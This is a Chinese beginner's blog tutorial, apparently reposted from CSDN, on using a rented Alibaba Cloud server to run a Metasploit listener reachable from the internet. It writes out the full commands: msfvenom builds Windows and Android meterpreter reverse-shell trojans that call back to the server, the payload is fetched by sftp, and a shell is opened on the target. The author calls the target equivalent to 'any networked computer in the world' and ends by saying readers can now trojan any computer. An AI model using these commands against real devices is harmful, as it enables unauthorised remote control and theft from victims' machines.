kali新手入门教学(5)--利用云服务器实现外网木马

昨天刚买了个一年的阿里云服务器,因为ngrok提供的内网穿透服务不太稳定,比较慢,想自己搞点事情。
首先使用的工具还是我们伟大的metasploit-framework,然后网上关于这个的教学都一般局限于局域网,确实局域网比较方便配置,而且实现也比较简单,因为设计到外网,只要在使用前确保你的目标靶机和你的主机可以互相ping通,就ok了。
好了首先把这次需要使用的几个工具先列一下。
metasploit-framework,用来生成木马并且获得shell,kali自带.服务器需要安装
nmap扫描,kali自带
sftp kali自带
ssh kali自带

1.配置防火墙

首先先去配置一下我们的服务器,由于我使用的是阿里云服务器,配置界面我就只提供阿里云的,其他服务器道理类似。
首先是阿里云自带的安全组,这个是比防火墙更可怕的东西,(怪不得阿里云安全。。),我曾经尝试过使用ufw disable的命令直接关闭防火墙,结果没用,重启也没用
在这里插入图片描述就是不允许你添加防火墙策略,好吧那只能手动修改。
进入阿里云的网络与安全,并且创建安全组,我的配置是这样的,大概可以这样配置,
在这里插入图片描述只需要修改入网规则,出网是默认无限制,然后我的msfconsole监听的端口就是我设置的9999端口,大家可以先记住。

2.下载木马神器

修改完服务器的安全组策略后就可以先远程控制服务器下载我们需要的软件了也就是我们的木马神器。
在kali终端输入
ssh [email protected]
然后输入你的密码,成功了就可以看到刚才类似的界面了。
【备注:(10.10.10.10)对应的是服务器的外网ip地址,一定要区分好外网和内网的ip地址,在本次教程中我们几乎不用关注内网ip地址,所使用的都是外网ip地址,说直白了,就是其他人可以访问的你的地址…】
下载木马神器有两种方法,
(1)apt-get install metasploit-framework
(2)curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

chmod 755 msfinstall

./msfinstall
这两种方法都可以,第一个稍微方便一点,然后安装完以后输入msfconsole能进入以下界面就说明你成功了
在这里插入图片描述界面酷酷的,好看.

3.生成木马

这里我们用win10作为测试,同样也可以入侵安卓手机。
现在这个环境里的win10就相当于世界上任意一台联网的电脑,(点到为止,你懂的),然后执行以下命令
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 9999
show options
在这里插入图片描述执行完命令一定要查看一下是否配置成功,lport对应的就是刚才安全组允许的端口地址,(tcp),然后对应的监听地址是0.0.0.0 ,这个真的是0.0.0.0,不要改(这个我也是看有些大佬讲的,可以用,具体原因我也不太清楚。。),payload根据你要选择的系统决定,这里是windows,
配置成功后就可以exploit

4.确认是否开放了当前9999端口

由于我测试的时候出了很多问题,所以不放心就另外测试了一下,在使用的时候最好也这样有利于及时debug
这里就可以用到nmap扫描神器
在kali主机上执行
nmap -sS -A 10.10.10.10 -p 9999
10.10.10.10就是你的外网ip,然后指定端口为9999
如果可以看到一下界面说明已经开始了监听,(如果你没有启动msfconsole并且exploit是探测不到的,正常情况下9999端口没有使用是探测不到的,一定要exploit再开启探测)

扫描二维码关注公众号,回复: 11360360 查看本文章

在这里插入图片描述可以看到上面有个9999,tcp
(下面那段奇怪的是msf的原因)在这里插入图片描述同时你的msf也有反应,会显示有session,这说明你的监听正常可以去生成木马了

(5)生成木马

在打开一个终端,连入服务器,(一定要在服务器里生成木马在传下来,不然可能因为版本的原因导致无法拿到shell)
之前我想偷懒,准备在本机直接生成木马,只不过是ip和端口换了一下,但听有大佬说可能会反弹不到shell所以只好辛苦点去服务器上生成。

以下代码在服务器上生成
win10
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=9999 -f exe -o /root/test.exe
安卓
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=9999 R > /root/apk.apk

在这里插入图片描述生成好了ls一下可以查看生成的木马,记着修改 ip和port.

(6)从服务器获得木马

生成好木马记住木马位置,然后退出服务器,回到kali
执行以下命令进入sftp(这个更好用一些,推荐使用)
sftp [email protected]
然后输入密码,如果可以看到
sftp>说明成功了
pwd
确认当前路径,默认root
ls
查看当前目录下文件
然后
get test.exe
默认保存路径为本地的用户,由于我是root就在root目录下
当然他也会告诉你保存路径
在这里插入图片描述然后取出木马,放置到目标靶机上
由于我们这里的木马不能免杀,所以需要关闭我们的win10的防火墙,(怎么免杀后面会讲),然后点一下我们的木马,没有反应,但是可以看到已经拿到了shell
在这里插入图片描述
在这里插入图片描述可以看到返回了一个meterpreter,然后输入shell就可以进入目标电脑的cmd

ok大功告成,恭喜你可以为任何一台电脑安装木马了
再多提一下,内网木马就是再生成木马的时候和set lhost的时候换成自己主机的内网ip,比如说我的就是192,168,1.128
然后使用前先用靶机ping一下自己的主机,
cmd输入ping 192.168.1.128然后有回复说明可以使用内网木马,然后这个时候可以先生成木马
win10
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.128 LPORT=9999 -f exe -o /root/test.exe
安卓
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.128 LPORT=9999 R > /root/apk.apk
msfconsole
进入msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.128
set lport 9999
show option
exploit
坐等上钩

猜你喜欢

转载自blog.csdn.net/azraelxuemo/article/details/106069523
今日推荐